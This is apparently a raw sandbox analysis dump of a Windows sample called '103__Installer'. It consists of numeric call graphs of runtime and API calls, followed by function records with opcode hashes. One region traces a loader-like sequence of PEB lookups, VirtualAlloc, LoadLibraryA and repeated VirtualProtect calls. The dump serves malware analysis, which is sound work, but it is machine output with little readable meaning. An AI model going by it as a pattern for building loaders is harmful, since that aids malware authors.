25783->25785 25789 b72978 Mailbox 25783->25789 25793 b71fca 25784->25793 25796 b72512 77 API calls 2 library calls 25785->25796 25788 b72a94 25788->25789 25790 b71fca _Fputc 99 API calls 25788->25790 25789->25777 25790->25789 25791 b729f5 25791->25788 25791->25789 25797 b72408 77 API calls 2 library calls 25791->25797 25798 b74dc5 25793->25798 25795 b71fda 25795->25789 25796->25791 25797->25791 25799 b74dd1 _setlocale 25798->25799 25800 b74de4 25799->25800 25801 b74dfc 25799->25801 25844 b7a8eb 66 API calls __getptd_noexit 25800->25844 25817 b750e4 25801->25817 25804 b74de9 25845 b7a899 11 API calls __cftoa_l 25804->25845 25808 b74e77 25811 b74e85 25808->25811 25823 b7b099 25808->25823 25810 b74df4 _setlocale 25810->25795 25855 b74eb9 LeaveCriticalSection LeaveCriticalSection __fsopen 25811->25855 25814 b74e12 25814->25808 25853 b7a8eb 66 API calls __getptd_noexit 25814->25853 25815 b74e6c 25854 b7a899 11 API calls __cftoa_l 25815->25854 25818 b750f6 25817->25818 25819 b75118 EnterCriticalSection 25817->25819 25818->25819 25821 b750fe 25818->25821 25820 b74e02 25819->25820 25820->25808 25846 b7b073 25820->25846 25856 b7b747 25821->25856 25824 b7b073 __fseeki64_nolock 66 API calls 25823->25824 25825 b7b0a9 25824->25825 25826 b7b0b4 25825->25826 25827 b7b0cb 25825->25827 25919 b7a8eb 66 API calls __getptd_noexit 25826->25919 25829 b7b0cf 25827->25829 25832 b7b0dc __stbuf 25827->25832 25920 b7a8eb 66 API calls __getptd_noexit 25829->25920 25831 b7b0b9 25831->25811 25832->25831 25840 b7b132 25832->25840 25843 b7b13d 25832->25843 25921 b82366 25832->25921 25833 b7b1cc 25835 b7be77 __write 97 API calls 25833->25835 25834 b7b14c 25836 b7b163 25834->25836 25838 b7b180 25834->25838 25835->25831 25894 b7be77 25836->25894 25838->25831 25930 b7c491 71 API calls 6 library calls 25838->25930 25840->25843 25891 b7b1fd 25840->25891 25843->25833 25843->25834 25844->25804 25845->25810 25847 b7b094 25846->25847 25848 b7b07f 25846->25848 25847->25814 26024 b7a8eb 66 API calls __getptd_noexit 25848->26024 25850 b7b084 26025 b7a899 11 API calls __cftoa_l 25850->26025 25852 b7b08f 25852->25814 25853->25815 25854->25808 25855->25810 25857 b7b76f EnterCriticalSection 25856->25857 25858 b7b75c 25856->25858 25857->25820 25863 b7b685 25858->25863 25860 b7b762 25860->25857 25890 b7b5af 66 API calls 3 library calls 25860->25890 25864 b7b691 _setlocale 25863->25864 25865 b7b6a1 25864->25865 25866 b7b6b9 25864->25866 25867 b7c900 __FF_MSGBANNER 65 API calls 25865->25867 25868 b763b8 __malloc_crt 65 API calls 25866->25868 25874 b7b6c7 _setlocale 25866->25874 25869 b7b6a6 25867->25869 25870 b7b6d2 25868->25870 25871 b7c751 __NMSG_WRITE 65 API calls 25869->25871 25872 b7b6d9 25870->25872 25873 b7b6e8 25870->25873 25875 b7b6ad 25871->25875 25876 b7a8eb __cftoa_l 65 API calls 25872->25876 25877 b7b747 __lock 65 API calls 25873->25877 25874->25860 25878 b7b30d __mtinitlocknum GetModuleHandleW GetProcAddress ExitProcess 25875->25878 25876->25874 25879 b7b6ef 25877->25879 25880 b7b6b7 25878->25880 25881 b7b6f7 InitializeCriticalSectionAndSpinCount 25879->25881 25882 b7b722 25879->25882 25880->25866 25884 b7b707 25881->25884 25885 b7b713 25881->25885 25883 b74452 _free 65 API calls 25882->25883 25883->25885 25886 b74452 _free 65 API calls 25884->25886 25887 b7b73e __mtinitlocknum LeaveCriticalSection 25885->25887 25888 b7b70d 25886->25888 25887->25874 25889 b7a8eb __cftoa_l 65 API calls 25888->25889 25889->25885 25931 b763b8 25891->25931 25895 b7be83 _setlocale 25894->25895 25896 b7bea6 25895->25896 25897 b7be8b 25895->25897 25899 b7beb2 25896->25899 25902 b7beec 25896->25902 26013 b7a8fe 66 API calls __getptd_noexit 25897->26013 26015 b7a8fe 66 API calls __getptd_noexit 25899->26015 25900 b7be90 26014 b7a8eb 66 API calls __getptd_noexit 25900->26014 25937 b83e85 25902->25937 25904 b7beb7 26016 b7a8eb 66 API calls __getptd_noexit 25904->26016 25907 b7bef2 25909 b7bf14 25907->25909 25910 b7bf00 25907->25910 25908 b7bebf 26017 b7a899 11 API calls __cftoa_l 25908->26017 26018 b7a8eb 66 API calls __getptd_noexit 25909->26018 25947 b7b77a 25910->25947 25912 b7be98 _setlocale 25912->25831 25915 b7bf0c 26020 b7bf43 LeaveCriticalSection __unlock_fhandle 25915->26020 25916 b7bf19 26019 b7a8fe 66 API calls __getptd_noexit 25916->26019 25919->25831 25920->25831 25922 b82373 25921->25922 25924 b82382 25921->25924 26021 b7a8eb 66 API calls __getptd_noexit 25922->26021 25926 b823a0 25924->25926 26022 b7a8eb 66 API calls __getptd_noexit 25924->26022 25925 b82378 25925->25840 25926->25840 25928 b82393 26023 b7a899 11 API calls __cftoa_l 25928->26023 25930->25831 25934 b763c1 25931->25934 25932 b7729e _malloc 65 API calls 25932->25934 25933 b763f7 25933->25843 25934->25932 25934->25933 25935 b763d8 Sleep 25934->25935 25936 b763ed 25935->25936 25936->25933 25936->25934 25938 b83e91 _setlocale 25937->25938 25939 b83eeb 25938->25939 25942 b7b747 __lock 66 API calls 25938->25942 25940 b83f0d _setlocale 25939->25940 25941 b83ef0 EnterCriticalSection 25939->25941 25940->25907 25941->25940 25943 b83ebd 25942->25943 25944 b83ec6 InitializeCriticalSectionAndSpinCount 25943->25944 25946 b83ed9 25943->25946 25944->25946 25945 b83f1b ___lock_fhandle LeaveCriticalSection 25945->25939 25946->25945 25948 b7b789 __ftelli64_nolock 25947->25948 25949 b7b7bf 25948->25949 25950 b7b7de 25948->25950 25981 b7b7b4 25948->25981 25951 b7a8fe __set_osfhnd 66 API calls 25949->25951 25955 b7b83a 25950->25955 25956 b7b81d 25950->25956 25953 b7b7c4 25951->25953 25952 b765d1 setSBUpLow 5 API calls 25954 b7be75 25952->25954 25959 b7a8eb __cftoa_l 66 API calls 25953->25959 25954->25915 25957 b7b841 25955->25957 25958 b7b850 25955->25958 25960 b7a8fe __set_osfhnd 66 API calls 25956->25960 25961 b7c40c __lseeki64_nolock 68 API calls 25957->25961 25963 b82366 __stbuf 66 API calls 25958->25963 25962 b7b7cb 25959->25962 25964 b7b822 25960->25964 25965 b7b84d 25961->25965 25966 b7a899 __cftoa_l 11 API calls 25962->25966 25967 b7b856 25963->25967 25968 b7a8eb __cftoa_l 66 API calls 25964->25968 25965->25958 25966->25981 25969 b7baf8 25967->25969 25974 b7979c __getptd 66 API calls 25967->25974 25970 b7b82a 25968->25970 25972 b7bb07 25969->25972 25973 b7bda8 WriteFile 25969->25973 25971 b7a899 __cftoa_l 11 API calls 25970->25971 25971->25981 25975 b7bbc2 25972->25975 25985 b7bb1a 25972->25985 25977 b7bada 25973->25977 25978 b7bddb GetLastError 25973->25978 25976 b7b871 GetConsoleMode 25974->25976 25989 b7bc9c 25975->25989 25994 b7bbcf 25975->25994 25976->25969 25980 b7b89a 25976->25980 25979 b7be26 25977->25979 25977->25981 25983 b7bdf9 25977->25983 25978->25977 25979->25981 25986 b7a8eb __cftoa_l 66 API calls 25979->25986 25980->25969 25982 b7b8aa GetConsoleCP 25980->25982 25981->25952 25982->25977 26011 b7b8cd 25982->26011 25991 b7be04 25983->25991 25992 b7be18 25983->25992 25984 b7bb64 WriteFile 25984->25978 25988 b7bb98 25984->25988 25985->25979 25985->25984 25987 b7be49 25986->25987 25995 b7a8fe __set_osfhnd 66 API calls 25987->25995 25988->25977 25988->25985 26000 b7bbbd 25988->26000 25989->25979 25990 b7bd0d WideCharToMultiByte 25989->25990 25990->25978 25997 b7bd44 WriteFile 25990->25997 25996 b7a8eb __cftoa_l 66 API calls 25991->25996 25998 b7a911 __dosmaperr 66 API calls 25992->25998 25993 b7bc3e WriteFile 25993->25978 25999 b7bc72 25993->25999 25994->25979 25994->25993 25995->25981 26001 b7be09 25996->26001 26002 b7bd7b GetLastError 25997->26002 26005 b7bd6f 25997->26005 25998->25981 25999->25977 25999->25994 25999->26000 26000->25977 26004 b7a8fe __set_osfhnd 66 API calls 26001->26004 26002->26005 26003 b82566 __write_nolock 76 API calls 26003->26011 26004->25981 26005->25977 26005->25989 26005->25997 26005->26000 26006 b7b979 WideCharToMultiByte 26006->25977 26007 b7b9aa WriteFile 26006->26007 26007->25978 26009 b7b9d1 26007->26009 26008 b83cfb 78 API calls __fassign 26008->26011 26009->25977 26009->25978 26010 b83ba3 WriteConsoleW CreateFileW __write_nolock 26009->26010 26009->26011 26012 b7b9fe WriteFile 26009->26012 26010->26009 26011->25977 26011->26003 26011->26006 26011->26008 26011->26009 26012->25978 26012->26009 26013->25900 26014->25912 26015->25904 26016->25908 26017->25912 26018->25916 26019->25915 26020->25912 26021->25925 26022->25928 26023->25925 26024->25850 26025->25852 26026->25546 26027->25548 26028->25550 26032 b7abb4 26029->26032 26035 b7ab2f 26032->26035 26034 b71216 26034->25556 26034->25557 26036 b7ab3b __stbuf _setlocale 26035->26036 26037 b7ab67 26036->26037 26038 b7ab52 26036->26038 26039 b750e4 __lock_file 67 API calls 26037->26039 26050 b7a8eb 66 API calls __getptd_noexit 26038->26050 26042 b7ab6d 26039->26042 26041 b7ab57 26051 b7a899 11 API calls __cftoa_l 26041->26051 26052 b79a60 66 API calls 3 library calls 26042->26052 26045 b7ab78 26053 b79afc 97 API calls __flush 26045->26053 26046 b7ab62 _setlocale 26046->26034 26048 b7ab91 26054 b7abac LeaveCriticalSection LeaveCriticalSection __fsopen 26048->26054 26050->26041 26051->26046 26052->26045 26053->26048 26054->26046 26055 b72c31 26056 b72c3f 26055->26056 26058 b72c52 Mailbox 26055->26058 26061 b7285a 26056->26061 26059 b72c44 26067 b75902 26059->26067 26062 b72864 __EH_prolog 26061->26062 26064 b7288b Mailbox 26062->26064 26080 b72512 77 API calls 2 library calls 26062->26080 26064->26059 26065 b728aa 26065->26064 26081 b72408 77 API calls 2 library calls 26065->26081 26068 b7590e _setlocale 26067->26068 26069 b75935 26068->26069 26070 b75920 26068->26070 26073 b750e4 __lock_file 67 API calls 26069->26073 26078 b75930 _setlocale 26069->26078 26098 b7a8eb 66 API calls __getptd_noexit 26070->26098 26072 b75925 26099 b7a899 11 API calls __cftoa_l 26072->26099 26074 b7594e 26073->26074 26082 b75895 26074->26082 26078->26058 26080->26065 26081->26065 26083 b758a6 26082->26083 26084 b758ba 26082->26084 26107 b7a8eb 66 API calls __getptd_noexit 26083->26107 26091 b758b6 26084->26091 26101 b751c2 26084->26101 26086 b758ab 26108 b7a899 11 API calls __cftoa_l 26086->26108 26100 b7596e LeaveCriticalSection LeaveCriticalSection __fsopen 26091->26100 26092 b758ce 26093 b7b073 __fseeki64_nolock 66 API calls 26092->26093 26094 b758d4 26093->26094 26110 b7c617 72 API calls 6 library calls 26094->26110 26096 b758da 26096->26091 26111 b74452 66 API calls 2 library calls 26096->26111 26098->26072 26099->26078 26100->26078 26102 b751db 26101->26102 26106 b751fd 26101->26106 26103 b7b073 __fseeki64_nolock 66 API calls 26102->26103 26102->26106 26104 b751f6 26103->26104 26105 b7be77 __write 97 API calls 26104->26105 26105->26106 26109 b7c024 66 API calls _free 26106->26109 26107->26086 26108->26091 26109->26092 26110->26096 26111->26091 26112 5f814e0 26113 5f814e4 26112->26113 26117 5f81778 26113->26117 26122 5f817e1 26113->26122 26128 5f8165f 26113->26128 26118 5f8174f 26117->26118 26119 5f817a1 26118->26119 26133 5f817ff 26118->26133 26137 5f81810 26118->26137 26119->26113 26123 5f817ea 26122->26123 26125 5f8174f 26122->26125 26123->26113 26124 5f817a1 26124->26113 26125->26124 26126 5f817ff 3 API calls 26125->26126 26127 5f81810 3 API calls 26125->26127 26126->26125 26127->26125 26130 5f8169c 26128->26130 26129 5f817a1 26129->26113 26130->26129 26131 5f817ff 3 API calls 26130->26131 26132 5f81810 3 API calls 26130->26132 26131->26130 26132->26130 26134 5f81810 26133->26134 26141 5f82363 26134->26141 26135 5f81916 26135->26135 26138 5f81835 26137->26138 26140 5f82363 3 API calls 26138->26140 26139 5f81916 26140->26139 26142 5f82375 26141->26142 26146 5f87308 26142->26146 26150 5f872f8 26142->26150 26143 5f826fa 26143->26135 26147 5f8732d 26146->26147 26155 5f87597 26147->26155 26148 5f8738f 26148->26143 26151 5f87306 26150->26151 26152 5f87287 26150->26152 26154 5f87597 3 API calls 26151->26154 26152->26143 26153 5f8738f 26153->26143 26154->26153 26159 5f875e0 26155->26159 26168 5f875d0 26155->26168 26156 5f875b6 26156->26148 26160 5f875ed 26159->26160 26161 5f87615 26159->26161 26160->26156 26176 5f86f64 26161->26176 26163 5f87636 26163->26156 26164 5f8769b 26164->26156 26166 5f876fe GlobalMemoryStatusEx 26167 5f8772e 26166->26167 26167->26156 26170 5f875e0 26168->26170 26169 5f875ed 26169->26156 26170->26169 26171 5f86f64 GlobalMemoryStatusEx 26170->26171 26173 5f87632 26171->26173 26172 5f87636 26172->26156 26173->26172 26174 5f876fe GlobalMemoryStatusEx 26173->26174 26175 5f8772e 26174->26175 26175->26156 26177 5f86f6b GlobalMemoryStatusEx 26176->26177 26179 5f87632 26177->26179 26179->26163 26179->26164 26179->26166 26180 b73a8e 26183 b73aad 26180->26183 26181 b73ad9 26182 b73af3 26189 b73afa 26182->26189 26190 b73a6f 26182->26190 26183->26181 26183->26182 26185 b73a6f std::_Xfsopen 133 API calls 26183->26185 26185->26182 26188 b75902 __fcloseall 102 API calls 26188->26181 26189->26181 26189->26188 26194 b7747d 26190->26194 26192 b73a89 26192->26181 26193 b775c3 101 API calls 5 library calls 26192->26193 26193->26189 26196 b77489 _setlocale 26194->26196 26195 b7749c 26252 b7a8eb 66 API calls __getptd_noexit 26195->26252 26196->26195 26198 b774c9 26196->26198 26213 b81473 26198->26213 26199 b774a1 26253 b7a899 11 API calls __cftoa_l 26199->26253 26202 b774ce 26203 b774d5 26202->26203 26204 b774e2 26202->26204 26254 b7a8eb 66 API calls __getptd_noexit 26203->26254 26206 b77509 26204->26206 26207 b774e9 26204->26207 26230 b811dc 26206->26230 26255 b7a8eb 66 API calls __getptd_noexit 26207->26255 26208 b774ac @_EH4_CallFilterFunc@8 _setlocale 26208->26192 26214 b8147f _setlocale 26213->26214 26215 b7b747 __lock 66 API calls 26214->26215 26228 b8148d 26215->26228 26216 b81509 26218 b763b8 __malloc_crt 66 API calls 26216->26218 26220 b81510 26218->26220 26219 b81592 _setlocale 26219->26202 26221 b8151e InitializeCriticalSectionAndSpinCount 26220->26221 26227 b81502 26220->26227 26224 b8153e 26221->26224 26225 b81551 EnterCriticalSection 26221->26225 26222 b7b685 __mtinitlocknum 66 API calls 26222->26228 26262 b74452 66 API calls 2 library calls 26224->26262 26225->26227 26257 b8159d 26227->26257 26228->26216 26228->26222 26228->26227 26260 b75125 67 API calls __lock 26228->26260 26261 b75193 LeaveCriticalSection LeaveCriticalSection _doexit 26228->26261 26231 b811fe 26230->26231 26232 b81212 26231->26232 26241 b81229 26231->26241 26267 b7a8eb 66 API calls __getptd_noexit 26232->26267 26234 b81217 26268 b7a899 11 API calls __cftoa_l 26234->26268 26236 b8141a 26273 b7a8eb 66 API calls __getptd_noexit 26236->26273 26237 b8142c 26264 b85135 26237->26264 26240 b77514 26256 b7752f LeaveCriticalSection LeaveCriticalSection __fsopen 26240->26256 26241->26236 26251 b813c6 26241->26251 26269 b854bf 76 API calls __fassign 26241->26269 26242 b8141f 26274 b7a899 11 API calls __cftoa_l 26242->26274 26245 b81395 26245->26236 26270 b85359 76 API calls __mbsnbicmp_l 26245->26270 26247 b813bf 26247->26251 26271 b85359 76 API calls __mbsnbicmp_l 26247->26271 26249 b813de 26249->26251 26272 b85359 76 API calls __mbsnbicmp_l 26249->26272 26251->26236 26251->26237 26252->26199 26253->26208 26254->26208 26255->26208 26256->26208 26263 b7b66e LeaveCriticalSection 26257->26263 26259 b815a4 26259->26219 26260->26228 26261->26228 26262->26227 26263->26259 26275 b85071 26264->26275 26266 b85150 26266->26240 26267->26234 26268->26240 26269->26245 26270->26247 26271->26249 26272->26251 26273->26242 26274->26240 26278 b8507d _setlocale 26275->26278 26276 b85090 26395 b7a8eb 66 API calls __getptd_noexit 26276->26395 26278->26276 26280 b850c6 26278->26280 26279 b85095 26396 b7a899 11 API calls __cftoa_l 26279->26396 26286 b8493d 26280->26286 26283 b850e0 26397 b85107 LeaveCriticalSection __unlock_fhandle 26283->26397 26285 b8509f _setlocale 26285->26266 26287 b84964 26286->26287 26398 b87f22 26287->26398 26289 b84bef 26424 b7a847 26289->26424 26291 b849bf 26427 b7a8fe 66 API calls __getptd_noexit 26291->26427 26293 b85070 _setlocale 26296 b85090 26293->26296 26302 b850c6 26293->26302 26294 b84980 26294->26289 26294->26291 26297 b84a1a 26294->26297 26295 b849c4 26428 b7a8eb 66 API calls __getptd_noexit 26295->26428 26458 b7a8eb 66 API calls __getptd_noexit 26296->26458 26304 b84aa1 26297->26304 26313 b84a74 26297->26313 26300 b849ce 26429 b7a899 11 API calls __cftoa_l 26300->26429 26301 b85095 26459 b7a899 11 API calls __cftoa_l 26301->26459 26303 b8493d __tsopen_nolock 120 API calls 26302->26303 26307 b850e0 26303->26307 26430 b7a8fe 66 API calls __getptd_noexit 26304->26430 26460 b85107 LeaveCriticalSection __unlock_fhandle 26307->26460 26310 b84aa6 26431 b7a8eb 66 API calls __getptd_noexit 26310->26431 26312 b8509f _setlocale 26312->26283 26405 b83f4b 26313->26405 26314 b84ab0 26432 b7a899 11 API calls __cftoa_l 26314->26432 26317 b849d8 26317->26283 26318 b84b32 26319 b84b3b 26318->26319 26320 b84b5c CreateFileA 26318->26320 26433 b7a8fe 66 API calls __getptd_noexit 26319->26433 26322 b84bf9 GetFileType 26320->26322 26323 b84b89 26320->26323 26325 b84c4a 26322->26325 26326 b84c06 GetLastError 26322->26326 26327 b84bc2 GetLastError 26323->26327 26330 b84b9d CreateFileA 26323->26330 26324 b84b40 26434 b7a8eb 66 API calls __getptd_noexit 26324->26434 26440 b83d15 67 API calls 2 library calls 26325->26440 26438 b7a911 66 API calls 3 library calls 26326->26438 26436 b7a911 66 API calls 3 library calls 26327->26436 26330->26322 26330->26327 26332 b84b4a 26435 b7a8eb 66 API calls __getptd_noexit 26332->26435 26333 b84c2f CloseHandle 26334 b84be9 26333->26334 26336 b84c3d 26333->26336 26437 b7a8eb 66 API calls __getptd_noexit 26334->26437 26439 b7a8eb 66 API calls __getptd_noexit 26336->26439 26339 b84c68 26342 b84f5c 26339->26342 26343 b84cbe 26339->26343 26347 b84d2d 26339->26347 26341 b84c42 26341->26334 26342->26289 26345 b84fe6 CloseHandle 26342->26345 26441 b81702 68 API calls 3 library calls 26343->26441 26350 b8500f 26345->26350 26346 b84cc8 26348 b84cea 26346->26348 26349 b84cd1 26346->26349 26347->26342 26356 b84e87 26347->26356 26367 b84dd7 26347->26367 26444 b834e7 76 API calls 6 library calls 26348->26444 26442 b7a8fe 66 API calls __getptd_noexit 26349->26442 26353 b85013 GetLastError 26350->26353 26354 b84ef2 26350->26354 26456 b7a911 66 API calls 3 library calls 26353->26456 26354->26289 26355 b84cd6 26355->26347 26359 b84cde 26355->26359 26356->26342 26369 b84ea4 26356->26369 26372 b84dfb 26356->26372 26357 b84cfb 26361 b84d14 26357->26361 26445 b87cb1 100 API calls 6 library calls 26357->26445 26443 b7c57b 69 API calls 3 library calls 26359->26443 26360 b84e42 26360->26359 26449 b834e7 76 API calls 6 library calls 26360->26449 26361->26359 26446 b81702 68 API calls 3 library calls 26361->26446 26363 b8501f 26457 b83d96 67 API calls 2 library calls 26363->26457 26367->26342 26367->26360 26367->26372 26373 b84e26 26367->26373 26450 b7c40c 68 API calls 3 library calls 26369->26450 26371 b84eaf 26371->26372 26375 b84eba 26371->26375 26372->26342 26372->26359 26376 b7be77 __write 97 API calls 26372->26376 26447 b7c40c 68 API calls 3 library calls 26373->26447 26451 b7c40c 68 API calls 3 library calls 26375->26451 26376->26372 26377 b84eff 26379 b84f21 26377->26379 26386 b84f06 26377->26386 26378 b84ee5 26452 b7c57b 69 API calls 3 library calls 26378->26452 26455 b81702 68 API calls 3 library calls 26379->26455 26380 b84e5c 26380->26359 26380->26377 26380->26378 26380->26379 26385 b84e7e 26380->26385 26381 b84e31 26381->26372 26387 b84e38 26381->26387 26385->26342 26454 b81702 68 API calls 3 library calls 26386->26454 26448 b7c40c 68 API calls 3 library calls 26387->26448 26388 b84ec4 26388->26342 26388->26359 26389 b84eec 26453 b7a8eb 66 API calls __getptd_noexit 26389->26453 26391 b84f10 26391->26359 26391->26385 26395->26279 26396->26285 26397->26285 26399 b87f2e 26398->26399 26400 b87f43 26398->26400 26461 b7a8eb 66 API calls __getptd_noexit 26399->26461 26400->26294 26402 b87f33 26462 b7a899 11 API calls __cftoa_l 26402->26462 26404 b87f3e 26404->26294 26406 b83f57 _setlocale 26405->26406 26407 b7b685 __mtinitlocknum 66 API calls 26406->26407 26408 b83f67 26407->26408 26409 b7b747 __lock 66 API calls 26408->26409 26410 b83f6c _setlocale 26408->26410 26420 b83f7b 26409->26420 26410->26318 26411 b840c6 26465 b840db LeaveCriticalSection _doexit 26411->26465 26413 b84053 26464 b763fd 66 API calls __calloc_crt 26413->26464 26415 b83ffb EnterCriticalSection 26417 b8400b LeaveCriticalSection 26415->26417 26415->26420 26416 b7b747 __lock 66 API calls 26416->26420 26417->26420 26418 b8405c 26418->26411 26419 b83e85 ___lock_fhandle 68 API calls 26418->26419 26423 b840bd 26419->26423 26420->26411 26420->26413 26420->26415 26420->26416 26421 b83fd1 InitializeCriticalSectionAndSpinCount 26420->26421 26463 b8401d LeaveCriticalSection _doexit 26420->26463 26421->26420 26423->26411 26466 b7a71e 26424->26466 26427->26295 26428->26300 26429->26317 26430->26310 26431->26314 26432->26317 26433->26324 26434->26332 26435->26317 26436->26334 26437->26289 26438->26333 26439->26341 26440->26339 26441->26346 26442->26355 26443->26341 26444->26357 26445->26361 26446->26355 26447->26381 26448->26360 26449->26380 26450->26371 26451->26388 26452->26389 26453->26354 26454->26391 26455->26388 26456->26363 26457->26354 26458->26301 26459->26312 26460->26312 26461->26402 26462->26404 26463->26420 26464->26418 26465->26410 26467 b7a73d _memset __call_reportfault 26466->26467 26468 b7a75b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 26467->26468 26469 b7a829 __call_reportfault 26468->26469 26472 b765d1 26469->26472 26471 b7a845 GetCurrentProcess TerminateProcess 26471->26293 26473 b765db IsDebuggerPresent 26472->26473 26474 b765d9 26472->26474 26480 b82615 26473->26480 26474->26471 26477 b7dfa5 SetUnhandledExceptionFilter UnhandledExceptionFilter 26478 b7dfc2 __call_reportfault 26477->26478 26479 b7dfca GetCurrentProcess TerminateProcess 26477->26479 26478->26479 26479->26471 26480->26477 26481 3abfb37 26498 3ac1628 GetPEB 26481->26498 26483 3abfb57 26484 3ac1628 GetPEB 26483->26484 26485 3abfb6b 26484->26485 26486 3abfb84 VirtualAlloc 26485->26486 26497 3abfcc8 26485->26497 26487 3abfb9b 26486->26487 26486->26497 26488 3ac1628 GetPEB 26487->26488 26487->26497 26489 3abfc0d 26488->26489 26490 3abfc2b LoadLibraryA 26489->26490 26492 3abfc3b 26489->26492 26489->26497 26490->26490 26490->26492 26491 3ac1628 GetPEB 26491->26492 26492->26491 26493 3abfc77 26492->26493 26492->26497 26493->26497 26500 3abffe7 LoadLibraryA 26493->26500 26499 3ac163c 26498->26499 26499->26483 26501 3ac0004 26500->26501 26502 3abfcb5 26500->26502 26501->26502 26503 3ac002c VirtualProtect 26501->26503 26502->26497 26510 3ac00cd 26502->26510 26503->26502 26504 3ac0040 26503->26504 26505 3ac005a VirtualProtect 26504->26505 26506 3ac0076 26505->26506 26506->26502 26507 3ac008a VirtualProtect 26506->26507 26507->26502 26508 3ac009a 26507->26508 26509 3ac00af VirtualProtect 26508->26509 26509->26502 26512 3ac00de 26510->26512 26511 3ac00e4 26511->26497 26512->26511 26513 3ac0112 VirtualProtect 26512->26513 26513->26511 26514 3ac0126 26513->26514 26515 3ac0140 VirtualProtect 26514->26515 26516 3ac015c 26515->26516 26516->26511 26517 3ac0170 VirtualProtect 26516->26517 26517->26511 26518 3ac0180 26517->26518 26519 3ac0195 VirtualProtect 26518->26519 26519->26511
                  APIs
                  • __EH_prolog.LIBCMT ref: 00B725AD
                    • Part of subcall function 00B72202: __EH_prolog.LIBCMT ref: 00B72207
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 695f51a2aa6ddaef3956efc8162eae0191451e51324e6635d531043379de720e
                  • Instruction ID: 5211b258b6681e7f6dc7225829a0ebdddf62cf7f78b91664ca97f91e9c06ff5e
                  • Opcode Fuzzy Hash: 695f51a2aa6ddaef3956efc8162eae0191451e51324e6635d531043379de720e
                  • Instruction Fuzzy Hash: 06113AB5900218EFCF14DF98C981AAEBBB4FF18314F20819AE56667261C7719F00DBA0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3335700396.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_5f80000_103__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID: \V^m
                  • API String ID: 0-3751104571
                  • Opcode ID: 65ab9b027fdb9a34b59e9903ea87150e9299ad61e1dabde5b4cf2aad9d2406f1
                  • Instruction ID: a36d6b14b0a6c8cd24317fa3298456f605ab09ac64ad83fe521d4b01d2787bba
                  • Opcode Fuzzy Hash: 65ab9b027fdb9a34b59e9903ea87150e9299ad61e1dabde5b4cf2aad9d2406f1
                  • Instruction Fuzzy Hash: B2B16071E0021A9FDF10DFA9D885BEDBBF2BF88318F148129D815A7254EB789845CF81
                  Memory Dump Source
                  • Source File: 00000000.00000002.3335700396.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_5f80000_103__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7f02dbe78edbd599c64e6a40e2b1253b5911ac3f8725852b074320d88d6f0ffa
                  • Instruction ID: f0c6fdd599c16add2798ab3165dfe53d24cfaedcf1196c060dfc4795bf93ae2c
                  • Opcode Fuzzy Hash: 7f02dbe78edbd599c64e6a40e2b1253b5911ac3f8725852b074320d88d6f0ffa
                  • Instruction Fuzzy Hash: 14525639B00210DFDB08FB74D868B3E77A7BB88714F14856AD9469B394DF399C428B91
                  Memory Dump Source
                  • Source File: 00000000.00000002.3335700396.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_5f80000_103__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5db2a0f4ff4c1ebe852f8eb162cbab323424707e0892518866350803aab3d7d8
                  • Instruction ID: e18d8603a233f91bdaf5e7c81b45333c964e22a5c419173f997f21c40e24126b
                  • Opcode Fuzzy Hash: 5db2a0f4ff4c1ebe852f8eb162cbab323424707e0892518866350803aab3d7d8
                  • Instruction Fuzzy Hash: 66823A31A04209DFCB14EF68D984ABEBBF2FF48314F158599E456AB2A5D738EC41CB50
                  Memory Dump Source
                  • Source File: 00000000.00000002.3335700396.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_5f80000_103__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bd630ddc4b80efeb4004be93c3fc8469975f2925786ab85d952562fcc2737547
                  • Instruction ID: 2f628444e78d8d3d1cde2d7c4fb862e8fa8a6ace69cf444297311914d6652971
                  • Opcode Fuzzy Hash: bd630ddc4b80efeb4004be93c3fc8469975f2925786ab85d952562fcc2737547
                  • Instruction Fuzzy Hash: FC725D71A002199FDB14EF69C984BBEBBB6FF88314F14816AE455AB391DB38DC41CB50
                  Memory Dump Source
                  • Source File: 00000000.00000002.3335700396.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_5f80000_103__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3cd2c7306e3cf1b051ae5c80b451fbd24246812376ce04a42f1ef1987ea33dc0
                  • Instruction ID: aa1256d66d1750a1f6f7779c9a5f8ed6df35841f80c965124d925f5e9d0f892a
                  • Opcode Fuzzy Hash: 3cd2c7306e3cf1b051ae5c80b451fbd24246812376ce04a42f1ef1987ea33dc0
                  • Instruction Fuzzy Hash: 3EB16F70E00609EFDF10DFA9C8857AEBBF2BF88754F148529D815AB254EB789845CF81

